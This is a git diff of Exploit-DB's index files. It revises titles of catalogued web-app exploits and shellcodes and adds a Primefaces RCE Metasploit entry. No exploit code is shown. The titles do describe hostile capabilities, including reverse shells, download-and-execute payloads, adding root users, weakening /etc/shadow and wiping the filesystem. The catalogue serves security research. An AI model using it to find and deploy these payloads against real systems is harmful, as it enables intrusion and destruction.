-6680,exploits/php/webapps/6680.txt,"FOSS Gallery Public 1.0 - Arbitrary File Upload",2008-10-05,Pepelux,webapps,php,
+6680,exploits/php/webapps/6680.txt,"FOSS Gallery Public 1.0 - Arbitrary File Upload (PoC)",2008-10-05,Pepelux,webapps,php,
 6681,exploits/php/webapps/6681.txt,"PHP-Fusion Mod manuals - 'manual' SQL Injection",2008-10-05,boom3rang,webapps,php,
 6682,exploits/php/webapps/6682.txt,"PHP-Fusion Mod raidtracker_panel - 'INFO_RAID_ID' SQL Injection",2008-10-05,boom3rang,webapps,php,
 6683,exploits/php/webapps/6683.txt,"PHP-Fusion Mod recept - 'kat_id' SQL Injection",2008-10-05,boom3rang,webapps,php,
@@ -33152,7 +33154,7 @@ id,file,description,date,author,type,platform,port
 33239,exploits/php/webapps/33239.txt,"Vastal I-Tech Cosmetics Zone - 'view_products.php' SQL Injection",2009-09-22,OoN_Boy,webapps,php,
 33240,exploits/php/webapps/33240.txt,"Vastal I-Tech DVD Zone - 'view_mag.php' SQL Injection",2009-09-22,OoN_Boy,webapps,php,
 33241,exploits/php/webapps/33241.txt,"Vastal I-Tech DVD Zone - 'view_mag.php' Cross-Site Scripting",2009-09-22,OoN_Boy,webapps,php,
-33242,exploits/php/webapps/33242.txt,"Vastal I-Tech Agent Zone - SQL Injection",2009-09-23,OoN_Boy,webapps,php,
+33242,exploits/php/webapps/33242.txt,"Vastal I-Tech Agent Zone - 'view_listing.php' SQL Injection",2009-09-23,OoN_Boy,webapps,php,
 33345,exploits/php/webapps/33345.txt,"CuteNews 1.4.6 editnews Module - doeditnews Action Admin Moderation Bypass",2009-11-10,"Andrew Horton",webapps,php,
 33343,exploits/php/webapps/33343.txt,"CuteNews 1.4.6 - 'result' Cross-Site Scripting",2009-11-10,"Andrew Horton",webapps,php,
 33344,exploits/php/webapps/33344.txt,"CuteNews 1.4.6 - 'index.php' Cross-Site Request Forgery (New User Creation)",2009-11-10,"Andrew Horton",webapps,php,
@@ -36014,11 +36016,11 @@ id,file,description,date,author,type,platform,port
 37926,exploits/php/webapps/37926.txt,"Netsweeper 2.6.29.8 - SQL Injection",2015-08-21,"Anastasios Monachos",webapps,php,
 37927,exploits/php/webapps/37927.txt,"Netsweeper 4.0.4 - SQL Injection",2015-08-21,"Anastasios Monachos",webapps,php,
 37928,exploits/php/webapps/37928.txt,"Netsweeper 4.0.8 - SQL Injection / Authentication Bypass",2015-08-21,"Anastasios Monachos",webapps,php,
-37929,exploits/php/webapps/37929.txt,"Netsweeper 4.0.8 - Authentication Bypass",2015-08-21,"Anastasios Monachos",webapps,php,
+37929,exploits/php/webapps/37929.txt,"Netsweeper 4.0.8 - Authentication Bypass (via Disabling of IP Quarantine)",2015-08-21,"Anastasios Monachos",webapps,php,
 37930,exploits/php/webapps/37930.txt,"Netsweeper 4.0.9 - Arbitrary File Upload / Execution",2015-08-21,"Anastasios Monachos",webapps,php,
 37931,exploits/php/webapps/37931.txt,"Netsweeper 3.0.6 - Authentication Bypass",2015-08-21,"Anastasios Monachos",webapps,php,
 37932,exploits/php/webapps/37932.txt,"Netsweeper 4.0.8 - Arbitrary File Upload / Execution",2015-08-21,"Anastasios Monachos",webapps,php,
-37933,exploits/php/webapps/37933.txt,"Netsweeper 4.0.8 - Authentication Bypass",2015-08-21,"Anastasios Monachos",webapps,php,
+37933,exploits/php/webapps/37933.txt,"Netsweeper 4.0.8 - Authentication Bypass (via New Profile Creation)",2015-08-21,"Anastasios Monachos",webapps,php,
 37934,exploits/php/webapps/37934.txt,"WordPress Plugin Shopp - Multiple Vulnerabilities",2012-10-05,T0x!c,webapps,php,
 37935,exploits/php/webapps/37935.txt,"Interspire Email Marketer - Cross-Site Scripting / HTML Injection / SQL Injection",2012-10-08,"Ibrahim El-Sayed",webapps,php,
 37936,exploits/php/webapps/37936.txt,"Open Realty - 'select_users_lang' Local File Inclusion",2012-10-06,L0n3ly-H34rT,webapps,php,
@@ -37176,6 +37178,7 @@ id,file,description,date,author,type,platform,port
 43678,exploits/hardware/webapps/43678.txt,"D-Link DSL-2640R - Unauthenticated DNS Change",2018-01-17,"Todor Donev",webapps,hardware,
 43682,exploits/hardware/webapps/43682.txt,"Belkin N600DB Wireless Router - Multiple Vulnerabilities",2018-01-17,Wadeek,webapps,hardware,
 43683,exploits/php/webapps/43683.txt,"SugarCRM 3.5.1 - Cross-Site Scripting",2018-01-17,"Guilherme Assmann",webapps,php,
+43733,exploits/java/webapps/43733.rb,"Primefaces 5.x - Remote Code Execution (Metasploit)",2018-01-18,"Bjoern Schuette",webapps,java,
 40542,exploits/php/webapps/40542.txt,"Student Information System (SIS) 0.1 - Authentication Bypass",2016-10-14,lahilote,webapps,php,
 40543,exploits/php/webapps/40543.txt,"Web Based Alumni Tracking System 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php,
 40544,exploits/php/webapps/40544.txt,"Simple Dynamic Web 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php,
@@ -37628,7 +37631,7 @@ id,file,description,date,author,type,platform,port
 41456,exploits/php/webapps/41456.txt,"Joomla! Component Intranet Attendance Track 2.6.5 - SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php,
 41459,exploits/hardware/webapps/41459.py,"NETGEAR DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution",2017-02-25,SivertPL,webapps,hardware,
 41460,exploits/php/webapps/41460.txt,"Joomla! Component Gnosis 1.1.2 - 'id' SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php,
-41461,exploits/multiple/webapps/41461.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)",2017-01-15,"Mehmet Ince",webapps,multiple,
+41461,exploits/multiple/webapps/41461.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) < 9.1.-1600 - Remote Code Execution (Metasploit)",2017-01-15,"Mehmet Ince",webapps,multiple,
 41462,exploits/php/webapps/41462.txt,"Joomla! Component Appointments for JomSocial 3.8.1 - SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php,
 41463,exploits/php/webapps/41463.txt,"Joomla! Component My MSG 3.2.1 - SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php,
 41464,exploits/php/webapps/41464.txt,"Joomla! Component Spinner 360 1.3.0 - SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php,
@@ -38333,7 +38336,7 @@ id,file,description,date,author,type,platform,port
 42968,exploits/php/webapps/42968.txt,"Complain Management System - Hard-Coded Credentials / Blind SQL injection",2017-10-10,havysec,webapps,php,
 43013,exploits/cgi/webapps/43013.txt,"Linksys E Series - Multiple Vulnerabilities",2017-10-18,"SEC Consult",webapps,cgi,
 42971,exploits/php/webapps/42971.rb,"Trend Micro OfficeScan 11.0/XG (12.0) - Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",webapps,php,
-42972,exploits/php/webapps/42972.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",webapps,php,
+42972,exploits/php/webapps/42972.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) - 'Proxy.php' Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",webapps,php,
 42975,exploits/linux/webapps/42975.txt,"Trend Micro Data Loss Prevention Virtual Appliance 5.2 - Path Traversal",2017-10-11,"Leonardo Duarte",webapps,linux,
 42978,exploits/php/webapps/42978.txt,"OctoberCMS 1.0.425 (Build 425) - Cross-Site Scripting",2017-10-12,"Ishaq Mohammed",webapps,php,
 42979,exploits/php/webapps/42979.txt,"E-Sic Software livre CMS - 'q' SQL Injection",2017-10-12,"Guilherme Assmann",webapps,php,
@@ -38392,7 +38395,7 @@ id,file,description,date,author,type,platform,port
 43065,exploits/php/webapps/43065.py,"WordPress Plugin Ultimate Product Catalog 4.2.24 - PHP Object Injection",2017-10-30,tomplixsee,webapps,php,
 43066,exploits/php/webapps/43066.txt,"Zomato Clone Script - 'resid' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php,
 43067,exploits/php/webapps/43067.txt,"Website Broker Script - 'status_id' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php,
-43068,exploits/php/webapps/43068.txt,"Vastal I-Tech Agent Zone - SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php,
+43068,exploits/php/webapps/43068.txt,"Vastal I-Tech Agent Zone - 'searchCommercial.php' / 'searchResidential.php' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php,
 43069,exploits/php/webapps/43069.txt,"Php Inventory - Arbitrary File Upload",2017-10-30,"Ihsan Sencan",webapps,php,
 43070,exploits/php/webapps/43070.txt,"Online Exam Test Application - 'sort' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php,
 43071,exploits/php/webapps/43071.txt,"Nice PHP FAQ Script - 'nice_theme' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 2e5ab60f1..4240f44e4 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -17,13 +17,13 @@ id,file,description,date,author,type,platform
 13256,shellcodes/bsd/13256.c,"BSD/x86 - Reverse TCP (192.168.2.33:6969/TCP) Shell Shellcode (129 bytes)",2004-09-26,"Sinan Eren",shellcode,bsd
 13257,shellcodes/bsdi_x86/13257.txt,"BSDi/x86 - execve(/bin/sh) Shellcode (45 bytes)",2004-09-26,duke,shellcode,bsdi_x86
 13258,shellcodes/bsdi_x86/13258.txt,"BSDi/x86 - execve(/bin/sh) Shellcode (46 bytes)",2004-09-26,vade79,shellcode,bsdi_x86
-13260,shellcodes/bsdi_x86/13260.c,"BSDi/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (97 bytes)",2004-09-26,anonymous,shellcode,bsdi_x86
+13260,shellcodes/bsdi_x86/13260.c,"BSDi/x86 - execve(/bin/sh) + ToUpper Encoded Shellcode (97 bytes)",2004-09-26,anonymous,shellcode,bsdi_x86
 13261,shellcodes/freebsd/13261.txt,"FreeBSD x86 / x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes)",2009-04-13,c0d3_z3r0,shellcode,freebsd
 13262,shellcodes/freebsd_x86/13262.txt,"FreeBSD/x86 - setreuid + execve(pfctl -d) Shellcode (56 bytes)",2008-09-12,suN8Hclf,shellcode,freebsd_x86
 13263,shellcodes/freebsd_x86/13263.txt,"FreeBSD/x86 - Reverse TCP (192.168.1.33:8000/TCP) cat /etc/passwd Shellcode (112 bytes)",2008-09-10,suN8Hclf,shellcode,freebsd_x86
 13264,shellcodes/freebsd_x86/13264.txt,"FreeBSD/x86 - Kill All Processes Shellcode (12 bytes)",2008-09-09,suN8Hclf,shellcode,freebsd_x86
 13265,shellcodes/freebsd_x86/13265.c,"FreeBSD/x86 - Reverse Connection (172.17.0.9:8000/TCP) + Receive Shellcode + Payload Loader + Return Results Null-Free Shellcode (90 bytes)",2008-09-05,sm4x,shellcode,freebsd_x86
-13266,shellcodes/freebsd_x86/13266.asm,"FreeBSD/x86 - execve(/bin/cat /etc/master.passwd) Null-Free Shellcode (65 bytes)",2008-08-25,sm4x,shellcode,freebsd_x86
+13266,shellcodes/freebsd_x86/13266.asm,"FreeBSD/x86 - execve(/bin/cat /etc/master.passwd) + Null-Free Shellcode (65 bytes)",2008-08-25,sm4x,shellcode,freebsd_x86
 13267,shellcodes/freebsd_x86/13267.asm,"FreeBSD/x86 - Reverse TCP (127.0.0.1:8000/TCP) Shell (/bin/sh) + Null-Free Shellcode (89 bytes)",2008-08-21,sm4x,shellcode,freebsd_x86
 13268,shellcodes/freebsd_x86/13268.asm,"FreeBSD/x86 - setuid(0) + execve(ipf -Fa) Shellcode (57 bytes)",2008-08-21,sm4x,shellcode,freebsd_x86
 13269,shellcodes/freebsd_x86/13269.c,"FreeBSD/x86 - execve(/bin/sh) Encoded Shellcode (48 bytes)",2008-08-19,c0d3_z3r0,shellcode,freebsd_x86
@@ -38,14 +38,14 @@ id,file,description,date,author,type,platform
 13278,shellcodes/freebsd_x86/13278.asm,"FreeBSD/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (102 bytes)",2004-09-26,Scrippie,shellcode,freebsd_x86
 13279,shellcodes/freebsd_x86-64/13279.c,"FreeBSD/x86-64 - exec /bin/sh Shellcode (31 bytes)",2009-05-18,"Hack'n Roll",shellcode,freebsd_x86-64
 13280,shellcodes/freebsd_x86-64/13280.c,"FreeBSD/x86-64 - execve(/bin/sh) Shellcode (34 bytes)",2009-05-15,c0d3_z3r0,shellcode,freebsd_x86-64
-13281,shellcodes/generator/13281.c,"Linux/x86 - execve() Null-Free Shellcode (Generator)",2009-06-29,certaindeath,shellcode,generator
+13281,shellcodes/generator/13281.c,"Linux/x86 - execve() + Null-Free Shellcode (Generator)",2009-06-29,certaindeath,shellcode,generator
 13282,shellcodes/generator/13282.php,"Linux/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",shellcode,generator
-13283,shellcodes/generator/13283.php,"Windows XP SP1 - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",shellcode,generator
+13283,shellcodes/generator/13283.php,"Windows (XP SP1) - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",shellcode,generator
 13284,shellcodes/generator/13284.txt,"Linux - execve(/bin/sh) + Polymorphic + Printable ASCII Characters Shellcode (Generator)",2008-08-31,sorrow,shellcode,generator
-13285,shellcodes/generator/13285.c,"Linux/x86 - Command Generator Null-Free Shellcode (Generator)",2008-08-19,BlackLight,shellcode,generator
+13285,shellcodes/generator/13285.c,"Linux/x86 - Command Generator + Null-Free Shellcode (Generator)",2008-08-19,BlackLight,shellcode,generator
 13286,shellcodes/generator/13286.c,"Windows - Reverse TCP (127.0.0.1:123/TCP) Shell + Alphanumeric Shellcode (Encoder/Decoder) (Generator)",2008-08-04,"Avri Schneider",shellcode,generator
-13288,shellcodes/generator/13288.c,"(Generator) - HTTP/1.x Requests Shellcode (18+/26+ bytes)",2006-10-22,izik,shellcode,generator
-13289,shellcodes/generator/13289.c,"Windows x86 - Multi-Format Encoding Tool Shellcode (Generator)",2005-12-16,Skylined,shellcode,generator
+13288,shellcodes/generator/13288.c,"Linux/x86 - HTTP/1.x Requests Shellcode (18+/26+ bytes) (Generator)",2006-10-22,izik,shellcode,generator
+13289,shellcodes/generator/13289.c,"Windows/x86 - Multi-Format Encoding Tool Shellcode (Generator)",2005-12-16,Skylined,shellcode,generator
 13290,shellcodes/ios/13290.txt,"iOS Version-independent - Null-Free Shellcode",2008-08-21,"Andy Davis",shellcode,ios
 13291,shellcodes/hardware/13291.txt,"Cisco IOS - New TTY + Privilege Level To 15 + Reverse (21/TCP) Virtual Terminal Shell Shellcode",2008-08-13,"Gyan Chawdhary",shellcode,hardware
 13292,shellcodes/hardware/13292.txt,"Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes)",2008-08-13,"Varun Uppal",shellcode,hardware
@@ -82,17 +82,17 @@ id,file,description,date,author,type,platform
 13324,shellcodes/linux_x86/13324.c,"Linux/x86 - Read /etc/passwd Shellcode (65+ bytes)",2009-02-27,certaindeath,shellcode,linux_x86
 13325,shellcodes/linux_x86/13325.c,"Linux/x86 - chmod 666 /etc/shadow + exit(0) Shellcode (30 bytes)",2009-02-20,"Jonathan Salwan",shellcode,linux_x86
 13326,shellcodes/linux_x86/13326.c,"Linux/x86 - killall5 Shellcode (34 bytes)",2009-02-04,"Jonathan Salwan",shellcode,linux_x86
-13327,shellcodes/linux_x86/13327.c,"Linux/x86 - PUSH reboot() Shellcode (30 bytes)",2009-01-16,"Jonathan Salwan",shellcode,linux_x86
-13328,shellcodes/generator/13328.c,"Linux/x86 - Shellcode Obfuscator Null-Free (Generator)",2008-12-09,sm4x,shellcode,generator
-13329,shellcodes/linux_x86/13329.c,"Linux/x86 - Reverse UDP tcpdump (54321/UDP) Live Packet Capture Shellcode (151 bytes)",2008-11-23,XenoMuta,shellcode,linux_x86
+13327,shellcodes/linux_x86/13327.c,"Linux/x86 - reboot() + PUSH Shellcode (30 bytes)",2009-01-16,"Jonathan Salwan",shellcode,linux_x86
+13328,shellcodes/generator/13328.c,"Linux/x86 - Shellcode Obfuscator + Null-Free (Generator)",2008-12-09,sm4x,shellcode,generator
+13329,shellcodes/linux_x86/13329.c,"Linux/x86 - Reverse UDP (54321/UDP) tcpdump Live Packet Capture Shellcode (151 bytes)",2008-11-23,XenoMuta,shellcode,linux_x86
 13330,shellcodes/linux_x86/13330.c,"Linux/x86 - Append RSA Key to /root/.ssh/authorized_keys2 Shellcode (295 bytes)",2008-11-23,XenoMuta,shellcode,linux_x86
 13331,shellcodes/linux_x86/13331.c,"Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) For Full Access Shellcode (86 bytes)",2008-11-19,Rick,shellcode,linux_x86
 13332,shellcodes/linux_x86/13332.c,"Linux/x86 - Promiscuous Mode Detector Shellcode (56 bytes)",2008-11-18,XenoMuta,shellcode,linux_x86
-13333,shellcodes/linux_x86/13333.txt,"Linux/x86 - setuid(0) + execve(/bin/sh_0_0) Null-Free Shellcode (28 bytes)",2008-11-13,sch3m4,shellcode,linux_x86
+13333,shellcodes/linux_x86/13333.txt,"Linux/x86 - setuid(0) + execve(/bin/sh_0_0) + Null-Free Shellcode (28 bytes)",2008-11-13,sch3m4,shellcode,linux_x86
 13334,shellcodes/linux_x86/13334.txt,"Linux/x86 - setresuid(0_0_0) + /bin/sh Shellcode (35 bytes)",2008-09-29,sorrow,shellcode,linux_x86
 13335,shellcodes/linux_x86/13335.c,"Linux/x86 - iopl(3) + asm(cli) + while(1){} Shellcode (12 bytes)",2008-09-17,dun,shellcode,linux_x86
 13336,shellcodes/linux_x86/13336.c,"Linux/x86 - System Beep Shellcode (45 bytes)",2008-09-09,"Thomas Rinsma",shellcode,linux_x86
-13337,shellcodes/linux_x86/13337.c,"Linux/x86 - Reverse Connection (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)",2008-08-25,militan,shellcode,linux_x86
+13337,shellcodes/linux_x86/13337.c,"Linux/x86 - Reverse TCP (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)",2008-08-25,militan,shellcode,linux_x86
 13338,shellcodes/linux_x86/13338.c,"Linux/x86 - setreuid(geteuid_ geteuid) + execve(/bin/sh) Shellcode (39 bytes)",2008-08-19,Reth,shellcode,linux_x86
 13339,shellcodes/linux_x86/13339.asm,"Linux/x86 - Reverse TCP (8192/TCP) cat /etc/shadow Shellcode (155 bytes)",2008-08-18,0in,shellcode,linux_x86
 13340,shellcodes/linux_x86/13340.c,"Linux/x86 - Reverse PHP (Writes to /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes)",2008-08-18,GS2008,shellcode,linux_x86
@@ -101,7 +101,7 @@ id,file,description,date,author,type,platform
 13343,shellcodes/linux_x86/13343.asm,"Linux/x86 - Raw-Socket ICMP/Checksum Shell (/bin/sh) Shellcode (235 bytes)",2007-04-02,mu-b,shellcode,linux_x86
 13344,shellcodes/linux_x86/13344.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (40 bytes)",2007-03-09,"Kris Katterjohn",shellcode,linux_x86
 13345,shellcodes/linux_x86/13345.c,"Linux/x86 - Kill All Processes Shellcode (11 bytes)",2007-03-09,"Kris Katterjohn",shellcode,linux_x86
-13346,shellcodes/linux_x86/13346.s,"Linux/x86 - execve() Read Shellcode (92 bytes)",2006-11-20,0ut0fbound,shellcode,linux_x86
+13346,shellcodes/linux_x86/13346.s,"Linux/x86 - execve() + Read Shellcode (92 bytes)",2006-11-20,0ut0fbound,shellcode,linux_x86
 13347,shellcodes/linux_x86/13347.c,"Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (40 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86
 13348,shellcodes/linux_x86/13348.c,"Linux/x86 - Set System Time to 0 + exit() Shellcode (12 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86
 13349,shellcodes/linux_x86/13349.c,"Linux/x86 - Add Root User (r00t) To /etc/passwd Shellcode (69 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86
@@ -110,14 +110,14 @@ id,file,description,date,author,type,platform
 13352,shellcodes/linux_x86/13352.c,"Linux/x86 - execve(rm -rf /) Shellcode (45 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86
 13353,shellcodes/linux_x86/13353.c,"Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (28 bytes)",2006-11-16,Revenge,shellcode,linux_x86
 13354,shellcodes/linux_x86/13354.c,"Linux/x86 - execve(/bin/sh) Shellcode (22 bytes)",2006-11-16,Revenge,shellcode,linux_x86
-13355,shellcodes/linux_x86/13355.c,"Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() Null-Free Shellcode (111+ bytes)",2006-10-22,izik,shellcode,linux_x86
-13356,shellcodes/linux_x86/13356.c,"Linux/x86 - setreuid + Executes Command Shellcode (49+ bytes)",2006-08-02,bunker,shellcode,linux_x86
+13355,shellcodes/linux_x86/13355.c,"Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() + Null-Free Shellcode (111+ bytes)",2006-10-22,izik,shellcode,linux_x86
+13356,shellcodes/linux_x86/13356.c,"Linux/x86 - setreuid() + Executes Command Shellcode (49+ bytes)",2006-08-02,bunker,shellcode,linux_x86
 13357,shellcodes/linux_x86/13357.c,"Linux/x86 - stdin re-open + /bin/sh exec Shellcode (39 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
-13358,shellcodes/linux_x86/13358.c,"Linux/x86 - execve(/bin/sh) (Re-Use Of Strings In .rodata) Shellcode (16 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
+13358,shellcodes/linux_x86/13358.c,"Linux/x86 - execve(/bin/sh)  + Re-Use Of Strings In .rodata Shellcode (16 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
 13359,shellcodes/linux_x86/13359.c,"Linux/x86 - setuid(0) + /bin/sh execve() Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
 13360,shellcodes/linux_x86/13360.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + setuid() Shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
 13361,shellcodes/linux_x86/13361.c,"Linux/x86 - Bind TCP (2707/TCP) Shell Shellcode (84 bytes)",2006-07-04,oveRet,shellcode,linux_x86
-13362,shellcodes/linux_x86/13362.c,"Linux/x86 - execve() Diassembly Obfuscation Shellcode (32 bytes)",2006-05-14,BaCkSpAcE,shellcode,linux_x86
+13362,shellcodes/linux_x86/13362.c,"Linux/x86 - execve() + Diassembly + Obfuscation Shellcode (32 bytes)",2006-05-14,BaCkSpAcE,shellcode,linux_x86
 13363,shellcodes/linux_x86/13363.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (100 bytes)",2006-05-08,"Benjamin Orozco",shellcode,linux_x86
 13364,shellcodes/generator/13364.c,"Linux/x86 - Reverse TCP (192.168.13.22:31337/TCP) Shell (/bin/sh) Shellcode (82 bytes) (Generator)",2006-05-08,"Benjamin Orozco",shellcode,generator
 13365,shellcodes/linux_x86/13365.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (2)",2006-05-01,hophet,shellcode,linux_x86
@@ -136,22 +136,22 @@ id,file,description,date,author,type,platform
 13378,shellcodes/linux_x86/13378.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_ [/bin/sh_ NULL]) Shellcode (37 bytes)",2006-04-03,"Gotfault Security",shellcode,linux_x86
 13379,shellcodes/linux_x86/13379.c,"Linux/x86 - setreuid(0_0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (33 bytes)",2006-04-03,"Gotfault Security",shellcode,linux_x86
 13380,shellcodes/linux_x86/13380.c,"Linux/x86 - Download File (HTTP/1.x http://127.0.0.1:8081/foobar.bin) + Receive Shellcode + Payload Loader Shellcode (68+ bytes)",2006-03-12,izik,shellcode,linux_x86
-13381,shellcodes/linux_x86/13381.c,"Linux/x86 - TCP Proxy (192.168.1.16:1280/TCP) All Connect() Null-Free Shellcode (236 bytes)",2006-02-07,phar,shellcode,linux_x86
+13381,shellcodes/linux_x86/13381.c,"Linux/x86 - TCP Proxy (192.168.1.16:1280/TCP) All Connect() + Null-Free Shellcode (236 bytes)",2006-02-07,phar,shellcode,linux_x86
 13382,shellcodes/linux_x86/13382.c,"Linux/x86 - execve(/bin/sh) + Anti-IDS Shellcode (40 bytes)",2006-01-26,NicatiN,shellcode,linux_x86
-13383,shellcodes/linux_x86/13383.c,"Linux/x86 (Intel x86 CPUID) - execve(/bin/sh) XORED Encoded Shellcode (41 bytes)",2006-01-25,izik,shellcode,linux_x86
-13384,shellcodes/linux_x86/13384.c,"Linux/x86 - execve(/bin/sh) Shellcode +1 Encoded (39 bytes)",2006-01-25,izik,shellcode,linux_x86
+13383,shellcodes/linux_x86/13383.c,"Linux/x86 (Intel x86 CPUID) - execve(/bin/sh) + XORED Encoded Shellcode (41 bytes)",2006-01-25,izik,shellcode,linux_x86
+13384,shellcodes/linux_x86/13384.c,"Linux/x86 - execve(/bin/sh) Shellcode + 1 Encoded (39 bytes)",2006-01-25,izik,shellcode,linux_x86
 13385,shellcodes/linux_x86/13385.c,"Linux/x86 - Add Root User (xtz) To /etc/passwd + No Password Shellcode (59 bytes)",2006-01-21,izik,shellcode,linux_x86
-13386,shellcodes/linux_x86/13386.c,"Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve(/bin/sh) Shellcode (39 bytes)",2006-01-21,izik,shellcode,linux_x86
+13386,shellcodes/linux_x86/13386.c,"Linux/x86 - execve(/bin/sh) + Anti-Debug Trick (INT 3h trap) Shellcode (39 bytes)",2006-01-21,izik,shellcode,linux_x86
 13387,shellcodes/linux_x86/13387.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (80 bytes)",2006-01-21,izik,shellcode,linux_x86
 13388,shellcodes/linux_x86/13388.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (98 bytes)",2006-01-21,izik,shellcode,linux_x86
-13389,shellcodes/linux_x86/13389.c,"Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)",2006-01-21,izik,shellcode,linux_x86
+13389,shellcodes/linux_x86/13389.c,"Linux/x86 - Eject CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)",2006-01-21,izik,shellcode,linux_x86
 13390,shellcodes/linux_x86/13390.c,"Linux/x86 - Eject CD-Rom (Follows /dev/cdrom Symlink) + exit() Shellcode (40 bytes)",2006-01-21,izik,shellcode,linux_x86
 13391,shellcodes/linux_x86/13391.c,"Linux/x86 - Eject/Close CD-Rom Loop (Follows /dev/cdrom Symlink) Shellcode (45 bytes)",2006-01-21,izik,shellcode,linux_x86
 13392,shellcodes/linux_x86/13392.c,"Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (32 bytes)",2006-01-21,izik,shellcode,linux_x86
 13393,shellcodes/linux_x86/13393.c,"Linux/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell Shellcode (74 bytes)",2006-01-21,izik,shellcode,linux_x86
 13394,shellcodes/linux_x86/13394.c,"Linux/x86 - Normal Exit With Random (So To Speak) Return Value Shellcode (5 bytes)",2006-01-21,izik,shellcode,linux_x86
 13395,shellcodes/linux_x86/13395.c,"Linux/x86 - getppid() + execve(/proc/pid/exe) Shellcode (51 bytes)",2006-01-21,izik,shellcode,linux_x86
-13396,shellcodes/linux_x86/13396.c,"Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) + exit() Shellcode (4 bytes)",2006-01-21,izik,shellcode,linux_x86
+13396,shellcodes/linux_x86/13396.c,"Linux/x86 - (eax != 0 and edx == 0) + exit() Shellcode (4 bytes)",2006-01-21,izik,shellcode,linux_x86
 13397,shellcodes/linux_x86/13397.c,"Linux/x86 - reboot() Shellcode (20 bytes)",2006-01-21,izik,shellcode,linux_x86
 13398,shellcodes/linux_x86/13398.c,"Linux/x86 - setreuid(0_ 0) + execve(/bin/sh) Shellcode (31 bytes)",2006-01-21,izik,shellcode,linux_x86
 13399,shellcodes/linux_x86/13399.c,"Linux/x86 - execve(/bin/sh) + PUSH Shellcode (23 bytes)",2006-01-21,izik,shellcode,linux_x86
@@ -163,24 +163,24 @@ id,file,description,date,author,type,platform
 13405,shellcodes/linux_x86/13405.c,"Linux/x86 - _exit(1) Shellcode (7 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_x86
 13406,shellcodes/linux_x86/13406.c,"Linux/x86 - read(0_buf_2541) + chmod(buf_4755) Shellcode (23 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_x86
 13407,shellcodes/linux_x86/13407.c,"Linux/x86 - write(0__Hello core!\n__12) + exit() Shellcode (36/43 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_x86
-13408,shellcodes/linux_x86/13408.c,"Linux/x86 - Snoop /dev/dsp Null-Free Shellcode (172 bytes)",2005-11-04,phar,shellcode,linux_x86
+13408,shellcodes/linux_x86/13408.c,"Linux/x86 - Snoop /dev/dsp + Null-Free Shellcode (172 bytes)",2005-11-04,phar,shellcode,linux_x86
